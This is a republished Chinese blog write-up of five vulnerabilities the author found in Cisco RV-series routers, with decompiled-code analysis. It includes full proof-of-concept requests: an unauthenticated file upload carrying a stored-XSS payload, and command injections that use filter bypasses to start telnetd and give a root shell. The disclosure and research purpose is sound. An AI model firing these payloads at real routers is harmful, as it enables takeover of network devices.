思科企业级路由器0day漏洞挖掘

admin 2024年5月19日23:29:37评论76 views字数 7074阅读23分34秒阅读模式
思科企业级路由器0day漏洞挖掘


思科企业级路由器0day漏洞挖掘


前言

01

写这篇文章的初衷是因为有很多师傅问我:零基础小白该如何入手挖设备的二进制洞?很多师傅也许会觉得这是一件很困难的事情。读了这篇文章之后,我相信大家应该能体会到即使像思科这种全球头部大厂也是有很多很水的洞是可以很容易挖到的。


今年年初2月份的时候,笔者对美国思科RV系列部分型号的企业级网关路由器进行了漏洞挖掘,并拿到了多份思科官方的致谢以及获批了多个中高危的CVE漏洞编号。

笔者在此借这篇文章选择了五个漏洞,简单分享一下这些漏洞的细节以及相关漏洞挖掘经验。由于时间仓促,事情也比较多,笔者之前仅选择了较新的RV34x以及RV32x系列(和类似的RV0xx系列)设备最新固件对浅层的漏洞进行了挖掘,并未深入,主打一个水编号和混致谢。

希望本文能够给刚入门IoT安全,想要挖洞但不知如何入手的师傅们带来些帮助。由于篇幅有限,固件仿真模拟等相关内容就不展开了,师傅们可以自行尝试。最后也请各位大师傅们看到我的垃圾洞轻喷。

更多可公开的低质量垃圾漏洞:https://github.com/winmt/my-vuls,品相较好的洞后面也许会写文章再放出来相关细节。



CVE-2023-20073


漏洞描述


Cisco RV340RV340WRV345RV345P型号的企业路由器最新版固件中存在一个未授权任意文件上传漏洞,未授权攻击者可通过该漏洞上传并覆写文件,造成存储型XSS攻击等危害。


思科安全通告:

https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-sb-rv-afu-EXxwA65V.html


思科企业级路由器0day漏洞挖掘



漏洞细节


在配置文件/etc/nginx/conf.d/rest.url.conf中,我们注意到当访问/api/operations/ciscosb-file:form-file-upload的时候,仅仅检查了 Authorization字段是否为空。


思科企业级路由器0day漏洞挖掘


如果Authorization字段不为空,我们可以上传文件到/tmp/upload文件夹,并最终通过/form-file-upload调用uwsgi去执行upload.cgi


思科企业级路由器0day漏洞挖掘


思科企业级路由器0day漏洞挖掘


在二进制文件/www/cgi-bin/upload.cgi中,首先对multipart/form-data表单类型的POST请求报文进行了解析,通过boundary=获取分隔符。


思科企业级路由器0day漏洞挖掘


接着,将POST报文中的字段存入相关变量中。例如,pathparamfileparam字段的内容被存入了v30v31变量中。


思科企业级路由器0day漏洞挖掘


然后,通过分离Cookie中的sessionid=xxx获得session值。


思科企业级路由器0day漏洞挖掘


思科企业级路由器0day漏洞挖掘


然而,我们可以直接不经过session值的校验检查就进入sub_115EC函数(这里第一个参数是pathparam字段,第三个参数是fileparam字段)。


思科企业级路由器0day漏洞挖掘


sub_115EC函数中, 当a1(即pathparam字段的内容)为Portal时,我们可以强制移动之前未经授权上传的文件到/tmp/www目录下。

思科企业级路由器0day漏洞挖掘


思科企业级路由器0day漏洞挖掘


此外,在/www目录下,index.htmllogin.html文件都是/tmp/www目录下同名文件的软链接。


思科企业级路由器0day漏洞挖掘


总之,攻击者可以通过该漏洞不经过权限验证上传任意文件并覆写login.htmlindex.html和其他配置文件,造成如存储型XSS攻击的危害。


Poc


按照上文漏洞细节描述,容易写出如下攻击报文:

------hacked-by-winmt------Content-Disposition: form-data; name="pathparam"
Portal------hacked-by-winmt------Content-Disposition: form-data; name="fileparam"
login.html------hacked-by-winmt------Content-Disposition: form-data; name="file"; filename="login.html"Content-Type: application/octet-stream
<title>Hacked by winmt!</title><script>alert('Hacked by winmt!')</script>------hacked-by-winmt------


攻击演示


攻击前,访问/login.html页面正常。


思科企业级路由器0day漏洞挖掘


按照上述Poc,覆写login.html为如下内容攻击(尽管显示Error Input,攻击仍然是成功进行的)。


<title>Hacked by winmt!</title><script>alert('Hacked by winmt!')</script>


思科企业级路由器0day漏洞挖掘


攻击后,访问/login.html页面,可以看到页面已被我们任意篡改,造成了存储型XSS攻击。


思科企业级路由器0day漏洞挖掘




CVE-2023-20117


漏洞描述


Cisco RV320RV325系列企业级路由器最新固件中存在一个命令注入漏洞。通过身份验证的攻击者可通过该漏洞执行任意命令,获取设备的最高控制权。


思科安全通告:

https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-sb-rv32x-cmdinject-cKQsZpxL.html


思科企业级路由器0day漏洞挖掘


漏洞细节


在二进制文件/usr/local/EasyAccess/www/cgi-bin/ssi.cgiNK_UiConfNeedPasswd函数中,对md5_password字段过滤不严,并没有过滤nr命令分隔符。


思科企业级路由器0day漏洞挖掘


之后,在满足判断条件后,md5_password将会被拼接入acStack_340变量中,并直接作为命令被system函数执行。


简单查找一下关键字,即可知道该漏洞触发的入口在/sys_setting.htm


思科企业级路由器0day漏洞挖掘


思科企业级路由器0day漏洞挖掘


Poc


访问/sys_setting.htm并触发refresh操作时抓包,将POST报文中md5_password字段内容修改如下(表单数据直接换行即可):


11telnetd -l /bin/sh


攻击演示


按上述Poc发送请求报文,开启telnet服务:


思科企业级路由器0day漏洞挖掘


直接通过telnet远程登录,获得root shell


思科企业级路由器0day漏洞挖掘




CVE-2023-20118


洞描述


这其实是一组漏洞,相似的有很多,不过只统一分配了一个CVE编号,笔者这里也随便挑选一个来分析。


Cisco RV320RV325系列(以及RV016, RV042, RV042G, RV082系列)企业级路由器最新固件中存在一个命令注入漏洞。通过身份验证的攻击者可通过该漏洞执行任意命令,获取设备的最高控制权。


思科安全通思科安全通告:

https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-sbr042-multi-vuln-ej76Pke5.html


思科企业级路由器0day漏洞挖掘


漏洞细节


该漏洞存在于 **/usr/local/EasyAccess/www/cgi-bin/config.exp二进制文件中,并同样存在于相似的/usr/local/EasyAccess/www/cgi-bin/config_mirror.exp**文件中。


在主函数中,可见当我们的请求中包含export_cert&字符串时,将进入exportconfig_CertFile函数。



思科企业级路由器0day漏洞挖掘


exportconfig_CertFile函数中,当最后一个&后面的内容是MY_CA, 第二个和第三个&之间的内容将会被拼接入acStack1088变量,并作为system函数的参数执行命令。


思科企业级路由器0day漏洞挖掘



Poc


然而,在实际测试中,我们发现这些设备过滤(转义)了空格,不过可以用**${IFS}**来代替。

POST请求向https://192.168.1.1/cgi-bin/config.exp?export_cert&abc&;/usr/sbin/telnetd${IFS}-l${IFS}/bin/sh;&abc&MY_CA发送任意内容的报文。


或者:以POST请求向https://192.168.1.1/cgi-bin/config_mirror.exp?export_cert&abc&;/usr/sbin/telnetd${IFS}-l${IFS}/bin/sh;&abc&MY_CA发送任意内容的报文。


攻击演示


按照上述Poc发送请求报文:


思科企业级路由器0day漏洞挖掘


攻击后,可以通过telnet远程登录设备并获得了设备的最高控制权:


思科企业级路由器0day漏洞挖掘




CVE-2023-20128


漏洞描述


Cisco RV320RV325系列企业级路由器最新固件中存在一个命令注入漏洞。通过身份验证的攻击者可通过该漏洞执行任意命令,获取设备的最高控制权。


思科安全通告:

https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-sb-rv32x-cmdinject-cKQsZpxL.html

思科企业级路由器0day漏洞挖掘



漏洞细节


该漏洞存在于**/usr/local/EasyAccess/www/cgi-bin/import_config.cgi**二进制文件中。


main函数中,POST报文中的前两个表单数据字段通过两组fgets函数读取(每组读取四行,作为表单数据字段)。当form-data的第一个字段为1时,第二个字段中;之后的内容被拼接入 acStack1144变量中,并作为参数传递给upgradefromusb函数。


思科企业级路由器0day漏洞挖掘


upgradefromusb函数中,首先通过FUN_120003860函数在传递的参数中()之前添加转义(不过对该漏洞利用并没有影响)。然后,将处理后的内容直接拼接入acStack808变量中,并作为system的参数执行,而未进行任何检查。

思科企业级路由器0day漏洞挖掘


综上,攻击者可以在POST请求报文中表单数据的第二个字段的;后面注入任意命令并执行。


Poc


发送如下POST请求报文即可(注意用${IFS}代替空格):

POST /cgi-bin/import_config.cgi HTTP/1.1Host: 192.168.1.1Cookie: mlap=ZfRSjTJvVhNsYLzAUrxDcg==User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------16897455311731203775484527323Content-Length: 330Origin: https://192.168.1.1Referer: https://192.168.1.1/sys_setting.htmUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersConnection: close
-----------------------------16897455311731203775484527323Content-Disposition: form-data; name="submitrestoreconfig"
1-----------------------------16897455311731203775484527323Content-Disposition: form-data; name="USBconfigfile"
USB1;;telnetd${IFS}-l${IFS}/bin/sh;-----------------------------16897455311731203775484527323--


攻击演示


发送上述Poc报文:


思科企业级路由器0day漏洞挖掘


攻击后,可远程登录设备并获得root权限:


思科企业级路由器0day漏洞挖掘




某内部已知漏洞


漏洞描述


Cisco RV0xx系列的设备和Cisco RV32x系列的设备固件部分结构相似,于是我也看了下,不过这个漏洞在上报之后得到了厂商的回复:这是一个内部已知的漏洞。个人感觉这个漏洞的绕过相对前几个还复杂些,没想到反而撞洞了2333



Cisco RV016, RV042, RV042G, RV082系列企业级路由器最新固件中存在一个命令注入漏洞。通过身份验证的攻击者可通过该漏洞执行任意命令,获取设备的最高控制权。


漏洞细节


二进制文件**/usr/local/EasyAccess/www/cgi-bin/ssi.cgi**中存在漏洞。

NK_SNMPUpdate函数中,POST报文中的snmp_Mib2SysName字段内容存放在acStack1622变量中。当acStack1622变量中不包含特定的危险字符,则将会被拼接入acStack1110字符串中,并用system函数执行命令。


思科企业级路由器0day漏洞挖掘



然而,危险字符nr在此处并未被过滤。但是在实际测试中,可以发现这个系列的设备会将某些字符进行转义,如代表n%0a将会被转为%2a, 即*符号。根据这个转义规则,容易得到**%ea将会被转义为我们需要的n**;类似地,空格符%20也会被转义为其他字符。幸运的是,Tab符%09可以替代空格符,并且%09在这里不会被转义。因此,我们可以注入形如 **%ea/usr/sbin/telnetd%09-l%09/bin/sh%ea**的命令绕过这个转义操作。


同理,snmp_Mib2SysContact 

snmp_Mib2SysLocation 字段中也可注入命令触发同样的漏洞。


思科企业级路由器0day漏洞挖掘



Poc


发送如下报文,

snmp_Mib2SysName, snmp_Mib2SysContact 和snmp_Mib2SysLocation字段中注入恶意命令。


POST /sys_snmp.htm HTTP/1.1Host: 192.168.1.1Cookie: mlap=FqgbQ5aBA5wTvwGiB8wRcQ==Content-Length: 249Cache-Control: max-age=0Sec-Ch-Ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1Origin: https://192.168.1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://192.168.1.1/sys_snmp.htmAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close
page=sys_snmp.htm&submitStatus=1&log_ch=1&snmpStatusChange=1&snmpStatus=0&snmp_Mib2SysName=router61120c%ea/usr/sbin/telnetd%09-l%09/bin/sh%09-p%091111%ea&snmp_Mib2SysContact=winmt%ea/usr/sbin/telnetd%09-l%09/bin/sh%09-p%092222%ea&snmp_Mib2SysLocation=winmt%ea/usr/sbin/telnetd%09-l%09/bin/sh%09-p%093333%ea&snmp_GetCommunity=public&snmp_SetCommunity=private&snmp_TrapCommunity=public&snmp_SendTrap=


攻击演示


发送上述Poc中的请求报文。


思科企业级路由器0day漏洞挖掘


攻击后,可通过远程登录控制设备(22223333端口也可以)。


思科企业级路由器0day漏洞挖掘



思科企业级路由器0day漏洞挖掘

原文始发于微信公众号(信睿网络):思科企业级路由器0day漏洞挖掘

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月19日23:29:37
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   思科企业级路由器0day漏洞挖掘https://cn-sec.com/archives/2756460.html

发表评论

匿名网友 填写信息